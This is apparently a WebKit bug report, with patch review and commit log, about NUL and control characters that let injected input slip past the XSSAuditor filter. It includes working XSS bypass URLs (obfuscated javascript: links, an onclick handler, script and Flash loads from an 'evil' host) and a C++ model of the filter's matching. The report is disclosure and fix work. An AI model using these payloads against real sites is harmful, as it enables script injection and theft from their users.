Null/control characters in HTTP GET/POST data can bypass XSSAuditor with respect to JavaScript URLs.

Examples:

JavaScript URL with Null Character:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aal%00ert%28/XSS/%29%3EContinue%3C/a%3E

JavaScript URL with Control Character:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aalert%28/XSS%05/%29%3EContinue%3C/a%3E

+++ This bug was initially created as a clone of Bug #27071 +++

Null/control characters in HTTP GET/POST data can bypass XSSAuditor with respect to injected plugin-based objects, inline event handlers, and external scripts.

Examples:

Plugin-Injection:
http://good.webblaze.org/dbates/xsstest.php?q=%3Cobject%20classid=%22clsid:d27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase=%22http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab%22%20id=%22flashMov%22%3E%3Cparam%20name=%22movie%22%20value=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20name=%22flashMov%22%20allowScriptAccess=%22always%22%20type=%22application/x-shockwave-flash%22%20/%3E%3C/object%3E

Inline Event Handler:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E

External Scripts:
http://good.webblaze.org/dbates/xsstest.php?q=<script src='http://evil.webblaze.org/dbates/xss.js'></script>
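An added example, not the patch attached to this bug: a minimal C++ model of the comparison a reflected-XSS filter like XSSAuditor makes between the decoded request and the script the page is about to run, fed the report's own payloads. It assumes, as the report implies, that the engine ignores the NUL/control bytes when executing, so the script actually run is the plain `alert(...)`; a byte-for-byte match then misses the injection, while stripping those bytes from both sides before matching closes the gap.

```cpp
#include <string>

// Value of one hex digit, or -1 if the character is not one.
static int hexValue(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

// Decode %XX escapes and '+' the way a query-string parser does; %00 yields a real NUL byte.
std::string percentDecode(const std::string& in) {
    std::string out;
    for (size_t i = 0; i < in.size(); ++i) {
        int hi = -1, lo = -1;
        if (in[i] == '%' && i + 2 < in.size()) { hi = hexValue(in[i + 1]); lo = hexValue(in[i + 2]); }
        if (hi >= 0 && lo >= 0) { out.push_back(static_cast<char>(hi * 16 + lo)); i += 2; }
        else out.push_back(in[i] == '+' ? ' ' : in[i]);
    }
    return out;
}

// Strip NUL, other C0 controls and DEL so that "al\0ert" and "alert" compare equal.
std::string canonicalize(const std::string& in) {
    std::string out;
    for (char c : in) {
        unsigned char u = static_cast<unsigned char>(c);
        if (u >= 0x20 && u != 0x7f) out.push_back(c); // drop NUL, other C0 controls and DEL
    }
    return out;
}

// Byte-for-byte check: is the script about to run present verbatim in the decoded request?
bool naiveMatch(const std::string& rawQuery, const std::string& scriptSource) {
    return percentDecode(rawQuery).find(scriptSource) != std::string::npos;
}

// Hardened check: canonicalize both sides first, so stray control bytes cannot hide a match.
bool canonicalMatch(const std::string& rawQuery, const std::string& scriptSource) {
    return canonicalize(percentDecode(rawQuery)).find(canonicalize(scriptSource)) != std::string::npos;
}

// Constructed samples: the query strings from the report's example URLs.
const std::string kNullQuery = "q=%3Ca+href%3Djavascript%3Aal%00ert%28/XSS/%29%3EContinue%3C/a%3E";
const std::string kCtrlQuery = "q=%3Ca+href%3Djavascript%3Aalert%28/XSS%05/%29%3EContinue%3C/a%3E";
const std::string kHandlerQuery = "q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E";
```

The same canonicalization must be applied on both sides of the comparison; stripping only the request, or only the script, reintroduces the mismatch the report describes.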
Created attachment 32565: Patch with tests
Comment on attachment 32565 (Patch with tests)

This looks good, but can you make the same change to the V8 bindings in WebCore/bindings/v8?
Created attachment 32573: Updated patch with tests.

I made the changes in the V8 bindings, but how do I test it? Also, moved line "const String* savedSourceURL = m_sourceURL;" to its original place in file WebCore/bindings/js/ScriptController.cpp.
Comment on attachment 32573 (Updated patch with tests.)

This looks good. To test the V8 bindings, you need a Chromium build. I'll watch the chromium build bot to make sure it works fine.
Thanks.

(In reply to comment #4)
> (From update of attachment 32573)
> This looks good. To test the V8 bindings, you need a Chromium build. I'll
> watch the chromium build bot to make sure it works fine.
Sending        LayoutTests/ChangeLog
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link.html
Adding         LayoutTests/http/tests/security/xssAuditor/resources/echo-intertag-click-and-notify.pl
Sending        WebCore/ChangeLog
Sending        WebCore/bindings/js/ScriptController.cpp
Sending        WebCore/bindings/v8/ScriptController.cpp
Sending        WebCore/page/XSSAuditor.cpp
Sending        WebCore/page/XSSAuditor.h
Transmitting file data .............
Committed revision 45741.

http://trac.webkit.org/changeset/45741